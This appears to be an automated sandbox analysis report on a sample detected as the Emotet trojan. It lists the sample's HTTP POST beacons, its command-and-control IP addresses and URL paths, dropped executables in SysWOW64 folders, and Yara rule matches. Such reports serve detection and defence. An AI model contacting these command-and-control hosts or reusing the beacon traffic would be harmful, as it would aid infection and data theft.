              Source: global trafficHTTP traffic detected: POST /IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 167.114.153.111/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------kYHRLcw3User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 167.114.153.111:8080Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 67.170.250.203/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------Eoyapxu02W4DrmNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 67.170.250.203:443Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /gLDpms1fYdKy/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 121.124.124.40/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------xQkdZnrmTvVZqhGUUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 121.124.124.40:7080Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 103.86.49.11/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------------55np6X3FuJzN6N0jwc7TNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 103.86.49.11:8080Content-Length: 4612Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 74.214.230.200/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------08lfRHAZEMwmT24User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.214.230.200Content-Length: 4612Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /67tfsWS9hNw/KKtRVVGv4EtXppzG6kI/QUenxzCNc1M41S/3mazKpx2CkV0/iq7lqvPWFwbXzrG/URwQPsLPEtkyUnGKT/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 194.187.133.160/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------ZhnuNfjLptUX6mpUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 194.187.133.160:443Content-Length: 4596Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 88.153.35.32
              Source: unknownTCP traffic detected without corresponding DNS query: 88.153.35.32
              Source: unknownTCP traffic detected without corresponding DNS query: 88.153.35.32
              Source: unknownTCP traffic detected without corresponding DNS query: 88.153.35.32
              Source: unknownTCP traffic detected without corresponding DNS query: 88.153.35.32
              Source: unknownTCP traffic detected without corresponding DNS query: 88.153.35.32
              Source: unknownTCP traffic detected without corresponding DNS query: 107.170.146.252
              Source: unknownTCP traffic detected without corresponding DNS query: 107.170.146.252
              Source: unknownTCP traffic detected without corresponding DNS query: 107.170.146.252
              Source: unknownTCP traffic detected without corresponding DNS query: 107.170.146.252
              Source: unknownTCP traffic detected without corresponding DNS query: 107.170.146.252
              Source: unknownTCP traffic detected without corresponding DNS query: 107.170.146.252
              Source: unknownTCP traffic detected without corresponding DNS query: 173.212.214.235
              Source: unknownTCP traffic detected without corresponding DNS query: 173.212.214.235
              Source: unknownTCP traffic detected without corresponding DNS query: 173.212.214.235
              Source: unknownTCP traffic detected without corresponding DNS query: 173.212.214.235
              Source: unknownTCP traffic detected without corresponding DNS query: 173.212.214.235
              Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.111
              Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.111
              Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.111
              Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.111
              Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.111
              Source: unknownTCP traffic detected without corresponding DNS query: 167.114.153.111
              Source: unknownTCP traffic detected without corresponding DNS query: 173.212.214.235
              Source: unknownTCP traffic detected without corresponding DNS query: 67.170.250.203
              Source: unknownTCP traffic detected without corresponding DNS query: 67.170.250.203
              Source: unknownTCP traffic detected without corresponding DNS query: 67.170.250.203
              Source: unknownTCP traffic detected without corresponding DNS query: 67.170.250.203
              Source: unknownTCP traffic detected without corresponding DNS query: 121.124.124.40
              Source: unknownTCP traffic detected without corresponding DNS query: 121.124.124.40
              Source: unknownTCP traffic detected without corresponding DNS query: 121.124.124.40
              Source: unknownTCP traffic detected without corresponding DNS query: 121.124.124.40
              Source: unknownTCP traffic detected without corresponding DNS query: 121.124.124.40
              Source: unknownTCP traffic detected without corresponding DNS query: 121.124.124.40
              Source: unknownTCP traffic detected without corresponding DNS query: 103.86.49.11
              Source: unknownTCP traffic detected without corresponding DNS query: 103.86.49.11
              Source: unknownTCP traffic detected without corresponding DNS query: 103.86.49.11
              Source: unknownTCP traffic detected without corresponding DNS query: 103.86.49.11
              Source: unknownTCP traffic detected without corresponding DNS query: 103.86.49.11
              Source: unknownTCP traffic detected without corresponding DNS query: 103.86.49.11
              Source: unknownTCP traffic detected without corresponding DNS query: 74.214.230.200
              Source: unknownTCP traffic detected without corresponding DNS query: 74.214.230.200
              Source: unknownTCP traffic detected without corresponding DNS query: 74.214.230.200
              Source: unknownTCP traffic detected without corresponding DNS query: 74.214.230.200
              Source: unknownTCP traffic detected without corresponding DNS query: 74.214.230.200
              Source: unknownTCP traffic detected without corresponding DNS query: 74.214.230.200
              Source: unknownTCP traffic detected without corresponding DNS query: 173.212.214.235
              Source: unknownTCP traffic detected without corresponding DNS query: 194.187.133.160
              Source: unknownTCP traffic detected without corresponding DNS query: 194.187.133.160
              Source: unknownTCP traffic detected without corresponding DNS query: 194.187.133.160
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0042BEDB recv,0_2_0042BEDB
              Source: unknownHTTP traffic detected: POST /LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 88.153.35.32/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------oxhn8YFF02lqHFUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.153.35.32Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Aug 2024 17:10:55 GMTServer: ApacheContent-Length: 230Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 52 33 30 5a 53 2f 4b 73 34 56 68 2f 64 37 33 54 63 37 34 77 34 47 4a 52 2f 43 7a 65 68 56 4f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/ was not found on this server.</p></body></html>
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/
              Source: mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/4
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/wsock.dll.mui
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/
              Source: mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/?
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/D
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/b
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/67
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/E0jZ
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/W
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.124.124.40:7080/gLDpms1fYdKy/biP8R7/XHAjzKH0LnedA/4
              Source: mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/
              Source: mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/4
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/O
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/b
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.212.214.235:7080/R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/
              Source: mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.212.214.235:7080/R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/p
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.187.133.160:443/67tfsWS9hNw/KKtRVVGv4EtXppzG6kI/QUenxzCNc1M41S/3mazKpx2CkV0/iq7lqvPWFwbXz
              Source: mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://67.170.250.203:443/vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.214.230.200/LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.214.230.200/LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/3
              Source: mibincodec.exe, 00000003.00000002.3346168419.0000000000690000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://88.153.35.32/LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/
              Source: mibincodec.exe, 00000003.00000002.3346168419.0000000000690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://88.153.35.32/LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/4
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00422175 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00422175
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00422175 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_00422175

              E-Banking Fraud

              barindex
              Yara detected Emotet
              Source: Yara matchFile source: 2.2.dfscli.exe.219279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.2230000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.2260000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.21f0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F2650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,3_2_021F2650

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.2.dfscli.exe.219279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.218279e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.218052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.dfscli.exe.219052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.218052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.21c052e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.21c279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.21c052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.dfscli.exe.2230000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (233).exe.2260000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.dfscli.exe.219279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.218279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 3.2.mibincodec.exe.21f0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.dfscli.exe.219052e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02238CD0 CloseServiceHandle,DeleteService,OpenServiceW,CloseServiceHandle,2_2_02238CD0
              Source: C:\Users\user\Desktop\ExeFile (233).exeFile created: C:\Windows\SysWOW64\rtmpal\Jump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeFile created: C:\Windows\SysWOW64\KBDTZM\Jump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeFile deleted: C:\Windows\SysWOW64\rtmpal\dfscli.exe:Zone.IdentifierJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00401E500_2_00401E50
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040B0C20_2_0040B0C2
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_004231F40_2_004231F4
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040E6580_2_0040E658
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00410ECC0_2_00410ECC
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_022682400_2_02268240
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_022677400_2_02267740
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_022665300_2_02266530
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02263BA00_2_02263BA0
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02263F200_2_02263F20
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02261C700_2_02261C70
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02263D100_2_02263D10
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C5ABE0_2_021C5ABE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C92DE0_2_021C92DE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C380E0_2_021C380E
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C58AE0_2_021C58AE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C80CE0_2_021C80CE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C573E0_2_021C573E
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C9DDE0_2_021C9DDE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00401E502_2_00401E50
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040B0C22_2_0040B0C2
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_004231F42_2_004231F4
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040E6582_2_0040E658
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00410ECC2_2_00410ECC
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_022382402_2_02238240
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_022377402_2_02237740
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_022365302_2_02236530
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02233BA02_2_02233BA0
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02233F202_2_02233F20
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02231C702_2_02231C70
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02233D102_2_02233D10
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02195ABE2_2_02195ABE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_021992DE2_2_021992DE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0219380E2_2_0219380E
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_021958AE2_2_021958AE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_021980CE2_2_021980CE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0219573E2_2_0219573E
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02199DDE2_2_02199DDE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F82403_2_021F8240
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F3D103_2_021F3D10
